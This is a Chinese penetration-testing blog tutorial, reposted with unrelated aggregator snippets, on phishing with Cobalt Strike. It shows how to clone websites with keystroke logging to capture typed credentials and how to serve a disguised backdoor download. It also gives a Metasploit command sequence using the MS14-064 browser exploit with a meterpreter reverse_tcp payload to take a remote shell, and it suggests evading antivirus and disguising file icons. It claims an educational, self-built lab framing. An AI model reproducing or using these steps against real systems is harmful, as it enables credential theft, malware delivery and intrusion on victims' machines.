渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)

2023-10-30

**

渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)

**

作者:大余
时间:2020-12-17

简介:

渗透测试-地基篇:
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意:

对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!


一、前言

网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!

网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码、信用卡还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。

网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。

这篇主要演示如何克隆和利用漏洞等方式进行钓鱼,并控制对方!!

二、环境介绍

在这里插入图片描述
黑客(攻击者):
IP:192.168.1.9
系统:kali.2020.4

VPS服务器:
目前演示是用kali来架设做VPS公网服务器的!道理意义一样!

办公电脑:
系统:windwos7和windwos xp

目前kali上运行了Cobalt strike ,攻击者在自己的公网VPS服务器上制作了后门页面钓鱼,通过各种方式办公电脑收到对方邮件或者各种手段发送的钓鱼链接,最终黑客控制办公电脑的过程!!

三、钓鱼演示

下面会演示到所有CS自带模块中的钓鱼攻击演示!!

1、智能收集

在这里插入图片描述
打开System Profiler-分析器功能…

在这里插入图片描述
选择克隆www.baidu.com页面做钓鱼…

在这里插入图片描述
攻击对象访问:http://192.168.1.9/baidu

在这里插入图片描述
当通过各种形式…将192.168.1.9/baidu链接发送给对方,让对方点击后…跳转到了baidu页面…

在这里插入图片描述
可看到选择应用信息后,钓到了客户用的系统以及浏览器版本型号…这里别小看两个信息,思路是该模块可以修改,利用溢出代码等形式提权或者获得更多的信息收集…下面我会写一些演示!!

2、克隆模块和克隆网站进行键盘记录攻击

在这里插入图片描述
打开Web Drive-by–Clone Site克隆网站模块…
在这里插入图片描述
这里克隆网站可以是http和https的URL…克隆到192.168.2.153:801链接上!!
勾选Log Keystrokes on cloned site后,记录键盘操作!
在这里插入图片描述
打开Web Log,功能查看被攻击方登录页面的操作情况!
在这里插入图片描述
可看到访问192.168.2.153:801页面输入了用户名密码…
在这里插入图片描述
可看到记录了对方输入键盘的信息!!

3、克隆网站下载执行木马

在这里插入图片描述
打开Host File 克隆一个页面并提供一个后门文件…
在这里插入图片描述
file:选择CS生成的shell,或者MSF也行!
确定URL下载的地址端口链接等情况!

在这里插入图片描述
生成http://192.168.2.153:801/upload.exe恶意链接…

在这里插入图片描述
然后回到方法2中!!
在打开Clone Site联动克隆模块,将克隆baidu页面,Attack攻击选择恶意链接页面进行钓鱼!
意思就是对方访问http://192.168.2.153:801/dayu页面后会直接下载attack恶意链接后门文件,页面正常跳转到百度页面!

在这里插入图片描述
可看到google访问该页面下载了upload.exe生成的CS后门文件…
这里google带有web安全下载防御功能,IE高版本也会有提示,这种思路是两个模块配合完成的,其中可以修改图标、文件名、弄个免杀、换个欺骗链接,很好钓鱼!

4、Metasploit溢出代码与Cobalt Strik配合钓鱼

本次演示的是思路,拿的是一个针对XP或者以下系统,利用MS14_064利用IE执行远控木马…记住是思路!!
在这里插入图片描述

use exploit/windows/browser/ms14_064_ole_code_execution
set srvhost 192.168.2.153
set SRVPORT 6666
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.153
exploit

这里很简答,MSF执行即可~
http://192.168.2.153:6666/Sixcra获得恶意链接!

在这里插入图片描述
很简单,利用和方法3一样,打开克隆网站模块,放入Attack即可!!
这里就不勾选键盘记录了,因为直接能控制对方了!

在这里插入图片描述
生成URL:http://192.168.2.153:80/baidu

在这里插入图片描述
可看到当对方访问做好的http://192.168.2.153:80/baidu钓鱼页面后,直接跳转到了百度…
但是通过溢出漏洞在攻击端获得了对方的控制shell…

在这里插入图片描述
通过控制,继续横向渗透即可!!

四、总结

这里有四种方法,总结下思路,就是各种模块之间的配合进行简单的钓鱼,知道这些思路后,还可以和别的钓鱼工具配合,或者是别的方法融合!

这里提醒下,如果在克隆模块克隆的是HTTPS的页面,需要在攻击方加载SSL哦,不然没法记录或者执行!!

今天基础牢固就到这里,虽然基础,但是必须牢记于心。

要是你觉得这篇博客写的还不错,欢迎分享给身边的人,欢迎加入免费群共同学习成长。

在这里插入图片描述

如失效加个人以下图,个人微信拉入群。

在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五) 的相关文章

  • 使用 openCV 对图像中的子图像进行通用检测

    免责声明 我是计算机视觉菜鸟 我看过很多关于如何在较大图像中查找特定子图像的堆栈溢出帖子 我的用例有点不同 因为我不希望它是具体的 而且我不确定如何做到这一点 如果可能的话 但我感觉应该如此 我有大量图像数据集 有时 其中一些图像是数据集的
  • 如何生成给定范围内的回文数列表?

    假设范围是 1 X 120 这是我尝试过的 gt gt gt def isPalindrome s check if a number is a Palindrome s str s return s s 1 gt gt gt def ge
  • 如何在android上的python kivy中关闭应用程序后使服务继续工作

    我希望我的服务在关闭应用程序后继续工作 但我做不到 我听说我应该使用startForeground 但如何在Python中做到这一点呢 应用程序代码 from kivy app import App from kivy uix floatl
  • DreamPie 不适用于 Python 3.2

    我最喜欢的 Python shell 是DreamPie http dreampie sourceforge net 我想将它与 Python 3 2 一起使用 我使用了 添加解释器 DreamPie 应用程序并添加了 Python 3 2
  • 更改自动插入 tkinter 小部件的文本颜色

    我有一个文本框小部件 其中插入了三条消息 一条是开始消息 一条是结束消息 一条是在 单位 被摧毁时发出警报的消息 我希望开始和结束消息是黑色的 但被毁坏的消息 参见我在代码中评论的位置 插入小部件时颜色为红色 我不太确定如何去做这件事 我看
  • 打破嵌套循环[重复]

    这个问题在这里已经有答案了 有没有比抛出异常更简单的方法来打破嵌套循环 在Perl https en wikipedia org wiki Perl 您可以为每个循环指定标签 并且至少继续一个外循环 for x in range 10 fo
  • 执行命令而不将其保留在历史记录中[关闭]

    Closed 这个问题不符合堆栈溢出指南 help closed questions 目前不接受答案 在进行软件开发时 经常需要在命令行命令中包含机密信息 典型示例是将项目部署到服务器的凭据设置为环境变量 当我不想将某些命令存储在命令历史记
  • 使用 Pycharm 在 Windows 下启动应用程序时出现 UnicodeDecodeError

    问题是当我尝试启动应用程序 app py 时 我收到以下错误 UnicodeDecodeError utf 8 编解码器无法解码位置 5 中的字节 0xb3 起始字节无效 整个文件app py coding utf 8 from flask
  • 在pyyaml中表示具有相同基类的不同类的实例

    我有一些单元测试集 希望将每个测试运行的结果存储为 YAML 文件以供进一步分析 YAML 格式的转储数据在几个方面满足我的需求 但测试属于不同的套装 结果有不同的父类 这是我所拥有的示例 gt gt gt rz shorthand for
  • SSH,运行进程然后忽略输出

    我有一个命令可以使用 SSH 并在 SSH 后运行脚本 该脚本运行一个二进制文件 脚本完成后 我可以输入任意键 本地终端将恢复到正常状态 但是 由于该进程仍在我通过 SSH 连接的计算机中运行 因此任何时候它都会登录到stdout我在本地终
  • Geopandas 设置几何图形:MultiPolygon“等于 len 键和值”的 ValueError

    我有 2 个带有几何列的地理数据框 我将一些几何图形从 1 个复制到另一个 这对于多边形效果很好 但对于任何 有效 多多边形都会返回 ValueError 请指教如何解决这个问题 我不知道是否 如何 为什么应该更改 MultiPolygon
  • HTTPS 代理不适用于 Python 的 requests 模块

    我对 Python 还很陌生 我一直在使用他们的 requests 模块作为 PHP 的 cURL 库的替代品 我的代码如下 import requests import json import os import urllib impor
  • 如何将 numpy.matrix 提高到非整数幂?

    The 运算符为numpy matrix不支持非整数幂 gt gt gt m matrix 1 0 0 5 0 5 gt gt gt m 2 5 TypeError exponent must be an integer 我想要的是 oct
  • Python:尝试检查有效的电话号码

    我正在尝试编写一个接受以下格式的电话号码的程序XXX XXX XXXX并将条目中的任何字母翻译为其相应的数字 现在我有了这个 如果启动不正确 它将允许您重新输入正确的数字 然后它会翻译输入的原始数字 我该如何解决 def main phon
  • Python - 在窗口最小化或隐藏时使用 pywinauto 控制窗口

    我正在尝试做的事情 我正在尝试使用 pywinauto 在 python 中创建一个脚本 以在后台自动安装 notepad 隐藏或最小化 notepad 只是一个示例 因为我将编辑它以与其他软件一起使用 Problem 问题是我想在安装程序
  • Python:计算字典的重复值

    我有一本字典如下 dictA unit1 test1 alpha unit1 test2 beta unit2 test1 alpha unit2 test2 gamma unit3 test1 delta unit3 test2 gamm
  • VSCode:调试配置中的 Python 路径无效

    对 Python 和 VSCode 以及 stackoverflow 非常陌生 直到最近 我已经使用了大约 3 个月 一切都很好 当尝试在调试器中运行任何基本的 Python 程序时 弹出窗口The Python path in your
  • 如何使用 JSch 将多行命令输出存储到变量中

    所以 我有一段很好的代码 我很难理解 它允许我向我的服务器发送命令 并获得一行响应 该代码有效 但我想从服务器返回多行 主要类是 JSch jSch new JSch MyUserInfo ui new MyUserInfo String
  • 您可以在 Python 类型注释中指定方差吗?

    你能发现下面代码中的错误吗 米皮不能 from typing import Dict Any def add items d Dict str Any gt None d foo 5 d Dict str str add items d f
  • Pandas 与 Numpy 数据帧

    看这几行代码 df2 df copy df2 1 df 1 df 1 values 1 df2 ix 0 0 我们的教练说我们需要使用 values属性来访问底层的 numpy 数组 否则我们的代码将无法工作 我知道 pandas Data

随机推荐

  • tomcat为什么把那个文件取名为catalina

    内部寓意就是tomcat的脚本文件 寄寓 是个小岛的名字 开发者曾在岛上生活过 Tomcat的这个单词的意思是 公猫 因为它的开发者姆斯 邓肯 戴维森希望用一种能够自己照顾自己的动物代表这个软件 于是命名为tomcat 它的Logo兼吉祥物
  • 分布式环境下的数据一致性

    1 互联网技术的四大法宝 多线程 分布式 异步 缓存 2 事务 编程式事务 3乐观锁 悲观锁 基于状态机的乐观锁
  • Android中引用sweet-alert-dialog以及遇到的问题解决

    概述 sweet alert dialog是一个带动画效果的自定义对话框样式 可以让你的Android程序的对话框优美很多 GitHub地址 Android Studio中引用 repositories mavenCentral depen
  • 【解决vscode终端输出中文乱码问题图文教程】

    全网最全解决vscode运行C C 终端输出乱码问题图文教程 解决vscode终端输出中文乱码问题 强推 方法二 少走几年弯路 乱码原因 方法一 永久性 方法二 永久性 强力推荐 附加 CMD修改成旧控制台 方法三 临时性 如果之前尝试了其
  • kafka入门,发送原理和生产者重要参数(三)

    发送原理 在消息发送过程中 涉及两个线程 main线程和Sender线程 在main线程中创建了一个双端队列 RecordAccumulator Sender过程不断从RecordAccumulator中拉取消息发送到Kafka Broke
  • Maven本地仓库安装jar包

    开发过程中的jar包依赖 通常是通过中央仓库 阿里云仓库等地方直接下载的 但是有一些jar包是不太容易下载 或者说对应的仓库中没有对应的jar包 比如ojdbc6 11 2 0 1 0 jar这个jar包 maven中央仓库中就没有这个版本
  • 基于 WEB 的室内温湿度监测系统(树莓派)

    一 项目介绍 本实验通过 DHT11 模块测量大气中温湿度 利用树莓派多功能的用途 将温湿度测量结果显示到网页 并包含历史数据 实时折线图表示 二 实验介绍 1 实验原材料 树莓派 Raspberry 4 Model B DHT11 v1
  • 计算机添加启动程序,电脑的开机启动项怎么设置?

    每次电脑开机都一堆软件争先恐后的在自动启动 很影响我们的正常使用 电脑开机时间也越来越长 这时灵活的设置我们的开机启动项就很有必要了 能帮助我们更高效的使用电脑 那么 我们该怎么设置这些开机自启的软件呢 方法一 手动设置 1 添加电脑的开机
  • 【MongoDB】基于Docker的MongoDB replica set(副本集)更换节点

    之前搭的副本集 1主 1从 1投票 今天要进行把投票节点切换服务器 首先 在新服务器上启动mongodb服务 然后 在主节点上对集群配置进行更新 rs0 PRIMARY gt cfg rs conf rs0 PRIMARY gt cfg m
  • yolov5训练结果解析

    在每次训练之后 都会在runs train文件夹下出现一下文件 如下图 一 weights 包含best pt 做detect时用这个 和last pt 最后一次训练模型 二 confusion 1 混淆矩阵 混淆矩阵是对分类问题的预测结果
  • 【无标题】数组转化成tree

    在这里插入图片描述 父数组 father G1 G2 G3 G4 G5 子数组 son 1 2 3 4 5 数组转化成tree
  • java实现金额数字转换为中文大写

    import java io import java lang IllegalArgumentException public class ConvertNum 把金额阿拉伯数字转换为汉字表示 小数点后四舍五入保留两位 还有一种方法可以在转
  • 浅拷贝与深拷贝例题与思考

    title 浅拷贝与深拷贝 author hou wei date 2023 04 17 output html document knitr opts chunk set echo TRUE 问答题 0 请问你是如何理解 在 Python
  • sqlserver 批量快速插入数据

    先转换成DataTable 然后插入数据 1 使用最后再看看使用表值参数的效率 效率最高 首先先创建 表值特性类型的表 此表应该与转换后的datatable的列相同不然会出错 查看地方在 当前数据库下的 可编程性 类型 用户定义表类型 CR
  • 【分享】ST7920的LCD12864 Proteus仿真模型

    分享 ST7920的LCD12864 Proteus仿真模型 目前最新版本的是1 03 GitHub地址 https github com cdhigh lcd12864 st7920 proteus Proteus添加动态链接库文件 dl
  • 网站部署详细流程(包括域名,服务器的配置等)

    有很多做网页的前端后端小白都想把自己辛辛苦苦做出来的网站放到网上 让别人观摩观摩 可无奈技术有限 对于网站部署流程有些迷茫 在这里 我会告诉大家 如何将自己做出来的网站放到网上 首先 我们需要明白几个概念 备案 解析 然后 我们还要知道 应
  • 上传formData文件

    if config method get config file const data config data const formData new FormData Object keys data forEach key gt if A
  • QT的tableWidget数据存储到Excle

    目录 环境介绍 所需要的头文件 测试效果 TableWidget表格的内容 Excel表格内容 lt
  • Grub2启动项启动顺序修改

    关键点即 修改grub cfg 终端命令 sudo i 获取权限 chmod w boot grub grub cfg 给文件添加写入权限 gedit boot grub grub cfg 编辑文件内容 BEGIN etc grub d 3
  • 渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)

    渗透测试 地基钓鱼篇 Cobalt Strike钓鱼 二十五 作者 大余 时间 2020 12 17 简介 渗透测试 地基篇 该篇章目的是重新牢固地基 加强每日训练操作的笔记 在记录地基笔记中会有很多跳跃性思维的操作和方式方法 望大家能共同